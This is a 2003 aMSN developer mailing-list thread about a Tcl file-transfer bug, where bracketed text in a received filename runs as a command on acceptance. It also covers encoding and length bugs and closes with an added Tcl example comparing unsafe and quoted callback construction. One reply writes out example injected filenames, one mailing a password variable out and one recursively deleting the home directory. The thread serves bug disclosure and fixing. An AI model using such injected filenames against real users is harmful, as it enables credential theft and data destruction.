From: Alvaro J. I. <air...@us...> - 2003-02-05 19:46:44
Ok, as you like. I've tested and it doesn't happen now. Anyway, the command
would be executed AFTER you accept the file, so if you got a file called
something like:

file_[shell "mail an...@ho... -s subject \"$password\""].txt

or:

file_[rm ~/* -f -r].txt

just don't accept it ;)

Greets. Alvaro.

On Wed 05 Feb 2003 19:52, Richard Strand wrote:
> Hey.
> I thought about submitting the bug to some computer-security list to get
> some more experienced security experts to check if it could lead to some
> kinda remote compromise, but then I stopped myself.
> I am for giving out information about vulnerabilities etc. in order to keep
> information free, but... I don't know, it just wouldn't feel right with amsn
> so I didn't :D
>
> I haven't tried the cvs version yet 'cause the last time I updated via the
> cvs dir, I got some weird error messages (I don't have them logged,
> unfortunately). I'll just wait until the cvs tar.gz comes up instead, more
> convenient :)
>
> // :O "Somebody set us up the bomb!"
>
> > Hi, I'm going to check the filetransfer bug now. The problem is tcl tries
> > to run the command inside the brackets [1]. This can be a security hole,
> > as anyone could run a command on your computer if you accept a file with
> > [xxxxx] where xxxxx is a dangerous command. So I'm going to fix it quick.
> >
> > About the å, ä and/or ö characters, have you tried it now with the cvs
> > version of amsn? I fixed the procedure to do the characters encoding to
> > fix problems with these characters in nicks, so maybe it's fixed in files
> > too.
> >
> > Greets. Alvaro.
> >
> > On Fri 31 Jan 2003 00:13, Richard Strand wrote:
> > > This (note the filename!)...:
> > >
> > > [00:10:20] (*)...Þâ£ôMâ...(*) hey ya llegue!!!! soy yo!: Vill du ta emot
> > > filen 'c-song[1].swf' ( 857388 bytes ) Den kommer att sparas i
> > > /home/zync/amsn_received - (Acceptera / Avslå )
> > > ----------
> > > ----------
> > > Filöverföring accepterad.
> > > ----------
> > >
> > > ...lead to this:
> > >
> > > invalid command name "1"
> > >     while executing
> > > "1"
> > >
> > > ---end of the error message!-------
> > >
> > > Error in code-parsing while reading the filename? I think that's the
> > > problem, but I can't code perl so I can't patch it :P
> > >
> > > Another bug is when a file has å, ä and/or ö in it. Possibly even if a
> > > file has other extended ascii chars in it.
> > >
> > > When you send a file with those chars in them, it forces the other
> > > person in the chat to leave the conversation (it doesn't close their
> > > window at their computer, but amsn states that 'user leaves
> > > conversation' and that user won't get the filetransfer Accept / decline
> > > question).
> > >
> > > Also, when you send a textstring with over 1200 characters, they're
> > > also forced to quit and that string won't get sent to them.
> > >
> > > A cool thing to implement would be an option to see how many chars you
> > > have written in the message like "156 / 1200" (WRITTEN / TOTAL) and,
> > > of course, a 1200 char limit (or whatever the MSN protocol max-limit is
> > > nowadays, it was 1200 last time I checked).
> >
> > --
> > (:==============================:)
> > Alvaro J. Iradier Muro
> > air...@us...
> > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> > _______________________________________________
> > Amsn-devel mailing list
> > Ams...@li...
> > https://lists.sourceforge.net/lists/listinfo/amsn-devel

--
(:==============================:)
Alvaro J. Iradier Muro
air...@us...
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
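
The bracket problem discussed in this thread, as an added Tcl example that is not part of the original messages and not code from aMSN: it puts the vulnerable way of building a callback script beside the quoted form, and the reported filename 'c-song[1].swf' reproduces the "invalid command name" error in the unsafe handler. The procedure names save_file, accept_unsafe and accept_safe are hypothetical, and how aMSN actually built its accept callback is an assumption.

```tcl
# Added illustration; save_file, accept_unsafe and accept_safe are
# hypothetical names, not procedures from the aMSN source.
proc save_file {name} {
    return "saved as: $name"
}

# Vulnerable pattern: the callback script is built by string interpolation.
# When the script is evaluated later, Tcl parses the filename a second time
# and treats anything inside [ ] as a command to run.
proc accept_unsafe {filename} {
    set script "save_file $filename"
    return [uplevel #0 $script]
}

# Hardened pattern: [list] quotes every element as exactly one word, so the
# filename reaches save_file verbatim and is never parsed as script.
proc accept_safe {filename} {
    set script [list save_file $filename]
    return [uplevel #0 $script]
}

# The first name is the one from the report. The second is constructed for
# this example and only sets a variable, which makes the substitution
# visible without doing anything else.
set names [list {c-song[1].swf} {file_[set ::marker touched].txt}]

foreach name $names {
    foreach handler {accept_unsafe accept_safe} {
        set ::marker untouched
        if {[catch {$handler $name} result]} {
            set result "error: $result"
        }
        puts [format "%-14s %-34s -> %s (marker=%s)" \
            $handler $name $result $::marker]
    }
}
```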